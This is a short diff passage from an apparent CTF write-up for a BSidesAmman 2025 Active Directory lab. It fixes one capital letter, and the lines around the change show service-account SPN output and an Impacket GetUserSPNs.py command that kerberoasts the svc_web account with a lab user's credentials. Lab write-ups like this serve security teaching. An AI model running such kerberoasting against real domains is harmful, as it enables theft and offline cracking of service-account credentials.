ASYNC-Security/async-security.github.io/BSidesAmman-2025-Writeup.md

 TERMSRV/vdi.albalad.bsides.rv:3389     svc_vdi  CN=Service Accounts,CN=Users,DC=albalad,DC=bsides,DC=rv  2025-04-28 12:50:09.803337  <never>
 ```

-we see that it is slightly odd that none of the service accounts have logged on, but it could be alright if they are only ran as services. all of the users can be kerberoasted, but we will only focus on `svc_web` for now.
+We see that it is slightly odd that none of the service accounts have logged on, but it could be alright if they are only ran as services. all of the users can be kerberoasted, but we will only focus on `svc_web` for now.

 ```shell
 GetUserSPNs.py 'albalad.bsides.rv'/'hasan.bakri':'hasan.bakri' -request-user 'svc_web' -outputfile 'svc_web.tgs'